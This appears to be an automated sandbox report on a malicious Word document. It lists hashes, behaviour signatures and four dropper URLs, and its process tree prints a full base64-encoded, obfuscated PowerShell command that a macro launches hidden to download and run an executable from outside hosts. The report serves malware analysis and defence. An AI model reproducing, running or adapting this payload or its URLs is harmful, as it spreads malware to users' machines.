Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    14/05/2024, 03:52

General

  • Target

    3dc8ae0aebc187b796a856a973a349ab_JaffaCakes118.doc

  • Size

    117KB

  • MD5

    3dc8ae0aebc187b796a856a973a349ab

  • SHA1

    7538508187b13bcffca1d13630f571832b083f81

  • SHA256

    3a3f0ac2b9bf27bc9417bb360845f33db83a8854b549dcd8fbcb9b85e617dbde

  • SHA512

    055403e539992a2601cf6cc06b3b4f3b1328fbaf1b5d87bb8036fcbf9ef3321021d6571c500dcc168c1f5aad27fdf66250577a1a8a7d86f6d246ebed5cabedf3

  • SSDEEP

    1536:aIiQdI1iiguaEdgraY+agCUh/X+jsR4yINs:BiF1tgpEdZX+a4yINs

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://maisbrasilphoto.com.br/dojziJG/

exe.dropper

http://nincom.nl/pzN5/

exe.dropper

http://rehal.jp/fhwO9XG/

exe.dropper

http://rkschmidt.net/rqun/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3dc8ae0aebc187b796a856a973a349ab_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1728
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2604
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHeLL.exe
        PowersHeLL -WinDowsTyle hidden -e IAAuACgAKABnAGUAVAAtAHYAYQByAEkAQQBCAGwAZQAgACcAKgBtAEQAcgAqACcAKQAuAG4AYQBNAEUAWwAzACwAMQAxACwAMgBdAC0AagBvAEkAbgAnACcAKQAoACAAKAAoACIAewAxADcAfQB7ADEAMAB9AHsANAA3AH0AewAxADIANgB9AHsANwAzAH0AewAzADEAfQB7ADkANAB9AHsAMQAxADUAfQB7ADkAOQB9AHsANQA5AH0AewAxADAAMAB9AHsAOQAwAH0AewAzADcAfQB7ADEAMgA0AH0AewA3ADAAfQB7ADIAMQB9AHsAMAB9AHsAMgA3AH0AewA4ADYAfQB7ADYAMQB9AHsAOQA4AH0AewA1ADUAfQB7ADQAMAB9AHsANwB9AHsAMQAwADYAfQB7ADYANgB9AHsAMwA4AH0AewA1ADYAfQB7ADgAMQB9AHsAMQAxADQAfQB7ADIANgB9AHsANQA3AH0AewA3ADQAfQB7ADEAMgAxAH0AewA3ADYAfQB7ADEAMAA3AH0AewA0ADEAfQB7ADYAMgB9AHsANAA0AH0AewAxADEAMgB9AHsANwA5AH0AewAxADkAfQB7ADYAfQB7ADUAOAB9AHsANwA1AH0AewAxADIAMAB9AHsAMQAyAH0AewA4ADQAfQB7ADEAMQB9AHsAMQA1AH0AewAxADQAfQB7ADEAMQA4AH0AewAxADIANQB9AHsAOAA4AH0AewAxADAAMwB9AHsAMQAxADMAfQB7ADEAMQA5AH0AewA4ADkAfQB7ADcAMQB9AHsANgA5AH0AewA2ADUAfQB7ADQAOAB9AHsAOAA1AH0AewA0ADUAfQB7ADQANgB9AHsAOQA1AH0AewA4ADAAfQB7ADgAMwB9AHsAMgAwAH0AewAxADEAMAB9AHsANQAwAH0AewAxADEAMQB9AHsANwAyAH0AewAxADEANgB9AHsAMQAyADMAfQB7ADEAfQB7ADMAOQB9AHsAMwB9AHsANQA0AH0AewAzADMAfQB7ADUAfQB7ADQAMwB9AHsAMgAzAH0AewAxADAAMgB9AHsAOQB9AHsAOQAzAH0AewA5ADcAfQB7ADUAMgB9AHsANgA4AH0AewA0ADkAfQB7ADEAMgAyAH0AewAzADQAfQB7ADYAMAB9AHsAMQAzAH0AewA1ADEAfQB7ADkAMgB9AHsAMwAyAH0AewA0ADIAfQB7ADMANgB9AHsAOQA2AH0AewAxADgAfQB7ADgANwB9AHsAMQAwADEAfQB7ADUAMwB9AHsAMQAwADUAfQB7ADQAfQB7ADYANAB9AHsAMgB9AHsAMwAwAH0AewA5ADEAfQB7ADIAOAB9AHsANgA3AH0AewA3ADcAfQB7ADEAMQA3AH0AewAxADAAOQB9AHsANgAzAH0AewA4AH0AewAyADkAfQB7ADgAMgB9AHsAMQAwADgAfQB7ADIAMgB9AHsANwA4AH0AewAxADYAfQB7ADIANQB9AHsAMQAwADQAfQB7ADMANQB9AHsAMgA0AH0AIgAgAC0AZgAnACsARwBxACcALAAnAEoAUAAnACwAJwAgAEkAJwAsACcAcAB1AGIAJwAsACcATgBnAFoAMgBjACcALAAnAEcAcQBrAEkAYwBZACcALAAnAGEAcwBpACcALAAnAGwAaQBlAG4AdAA7AEkAJwAsACcALQBJACcALAAnACsAJwAsACcASgAnACwAJwAvACcALAAnAGoAegAnACwAJwBVACcALAAnAGgAdAB0AHAAOgAvAC8AbgBpAG4AJwAsACcAQAAnACwAJwBjAGEAJwAsACcASQAnACwAJwBlAFoAMgBjACgASQBKAFAAYQBzACcALAAnAHIAJwAsACcAcABsAGkAJwAsACcAcQBrACcALAAnAGUAYQBrACcALAAnACgARwAnACwAJwB9ACcALAAnAHQAJwAsACcAMgAxADMAMwAnACwAJwBrAHcARwBxAGsAKwBHAHEAawAtAG8AYgBqAGUAYwB0ACcALAAnACgAJwAsACcAdABlAG0ARwBxAGsAKQAoAEkASgBQAFMARABDACcALAAnAEoAJwAsACcAcQBrAG4ARwBxAGsAKwBHAHEAJwAsACcAbwBWAFIAdAAnACwAJwBjACAAKwAgACcALAAnAFAAJwAsACcAaAB7AH0AJwAsACcAbABWAFIAdABPAGEAZABGAEkAVgBSAHQAJwAsACcAbgBkACcALAAnAFAAbgBzAGEAZABhAHMAZAAuAG4AJwAsACcAZQBuAHYAOgAnACwAJwB0AC4AVwBlAGIAQwAnACwAJwAvAG8AcgBiAGkAcwBpAG4AYwAuACcALAAnAFcAbgAnACwAJwBHAHEAawAgACsAIABJAEoAUABOAFMAQgAgACsAIAAnACwAJwBiAGwAYwBZAGcAUAAvACcALAAnAGMAJwAsACcAaABtAGkAZAB0AC4AJwAsACcAUABuAHMAYQBkAGEAJwAsACcAaAB0AHQAJwAsACcARABDAFgAKQB7AHQAJwAsACcAKQAnACwAJwAuAFoAJwAsACcAKABJAEoAUABhAHMAZgBjACAAaQBuACcALAAnAFYAJwAsACcAbABpACcALAAnAE4AZQAnACwAJwBlAHgAdAAoADEAJwAsACcAKQA7AEkAJwAsACcAbABwAGgAbwAnACwAJwBHAHEAawB0ACcALAAnAFkAWQAnACwAJwBxAGsAKQAgAFMAeQBzAHQAZQAnACwAJwBjAG8AbQAvACcALAAnAGsAZQAnACwAJwAoACkALAAnACwAJwAvAEAAJwAsACcATgBTAEIAIAA9ACAASQBKACcALAAnAEcAJwAsACcAIABJAEoAUABBACcALAAnAGgAdwBPADkAWABHACcALAAnAFkAVQAgAD0AIAAuACgARwBxAGsAbgBlAEcAJwAsACcALwByAGUAaABhAGwALgBqAHAALwBmACcALAAnAFAAUwBEAEMAIAAnACwAJwBkACAAPQAgACYAKABHACcALAAnAEoAUABBAEQAQwAnACwAJwB0AG8ALgBjAG8AbQAuAGIAcgAnACwAJwAgAEcAcQBrAA0ACgBoAHQAdABwACcALAAnAHEAawBJAG4AdgBvAEcAJwAsACcAOwB9ACcALAAnAC8AbQBhAGkAcwBiACcALAAnAHIAcQAnACwAJwAwADAAMAAnACwAJwApACcALAAnAHUAbgAvAEcAcQBrAC4AUwAnACwAJwBpAEoARwAnACwAJwBwADoALwAvAHIAawBzACcALAAnAEcAJwAsACcAZgBjAC4AWgAyAGMAVABvAFMAJwAsACcALwBwAHoAJwAsACcAOgAvACcALAAnAGEAJwAsACcAUABTAEQAQwApADsAJgAnACwAJwAyAGMARAAnACwAJwBHAHEAawBlAEcAcQBrACkAOwBmACcALAAnAGsAZQAnACwAJwBuAGUAdAAvACcALAAnAGwAJwAsACcAbwByAGUAYQBjAGgAJwAsACcAbQAuACcALAAnAGIAagBlAGMARwBxAGsAKwAnACwAJwBHAHEAawApACAAcgAnACwAJwB0AHIAVgBSAHQAaQAnACwAJwBxAGsALgBlAHgARwBxAGsAJwAsACcATgAnACwAJwBjACcALAAnAFIAdAAnACwAJwBKAFAAJwAsACcAOgAvACcALAAnADsAYgByACcALAAnAHEAawArAEcAcQAnACwAJwB0ACgARwBxAGsAQABHAHEAawAnACwAJwA7AEkASgAnACwAJwBAAGgAdAB0AHAAOgAvACcALAAnADUALwBAAGgAJwAsACcAMAAsACAAMgA4ACcALAAnAEcAcQBrACsARwBxAGsAdwAtAG8AJwAsACcAPQAgACcALAAnAHEAawArAEcAcQBrAGsARwAnACwAJwBjAG8AJwAsACcAdAB0AHAAJwAsACcALwBkAG8AJwAsACcAWAAgAD0AJwAsACcAcgB5AHsASQBKACcALAAnAEkAJwAsACcAbwBtADsASQBKAFAAWQAnACwAJwBtAC4AbgBsACcALAAnAHMAJwApACkALgByAEUAcABsAGEAYwBFACgAKABbAEMAaABBAHIAXQA4ADYAKwBbAEMAaABBAHIAXQA4ADIAKwBbAEMAaABBAHIAXQAxADEANgApACwAWwBzAFQAcgBpAE4AZwBdAFsAQwBoAEEAcgBdADkANgApAC4AcgBFAHAAbABhAGMARQAoACcAWgAyAGMAJwAsAFsAcwBUAHIAaQBOAGcAXQBbAEMAaABBAHIAXQAzADQAKQAuAHIARQBwAGwAYQBjAEUAKAAoAFsAQwBoAEEAcgBdADcAMwArAFsAQwBoAEEAcgBdADkAOQArAFsAQwBoAEEAcgBdADgAOQApACwAWwBzAFQAcgBpAE4AZwBdAFsAQwBoAEEAcgBdADkAMgApAC4AcgBFAHAAbABhAGMARQAoACcASQBKAFAAJwAsACcAJAAnACkALgByAEUAcABsAGEAYwBFACgAJwBHAHEAawAnACwAWwBzAFQAcgBpAE4AZwBdAFsAQwBoAEEAcgBdADMAOQApACAAKQA=
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:960

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            1ead347ef87c1192a1b015cbfddcdf93

            SHA1

            0f2bf48a77617e238dfd2f8aa4089665df0f228a

            SHA256

            466d9be25f9f05312caf5fb4f6596356e49beb2f5b67bb25d22609038b53d3a0

            SHA512

            232bd41f6088d9af38df41a08cc832348d17a2e66a28aee6c2c71192159f3d200d053c2882d275d20ce282931f8ab99b1378bb84b6151dac44dd1880eac49d2f

          • memory/1728-19-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-35-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-6-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-15-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-16-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-14-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-12-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-11-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-22-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-9-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-8-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-7-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-20-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-18-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-2-0x000000007150D000-0x0000000071518000-memory.dmp

            Filesize

            44KB

          • memory/1728-21-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-10-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-0-0x000000002F081000-0x000000002F082000-memory.dmp

            Filesize

            4KB

          • memory/1728-67-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-114-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-60-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-49-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-31-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-26-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-25-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-24-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-64-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-23-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-121-0x000000007150D000-0x0000000071518000-memory.dmp

            Filesize

            44KB

          • memory/1728-122-0x0000000000650000-0x0000000000750000-memory.dmp

            Filesize

            1024KB

          • memory/1728-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/1728-138-0x000000007150D000-0x0000000071518000-memory.dmp

            Filesize

            44KB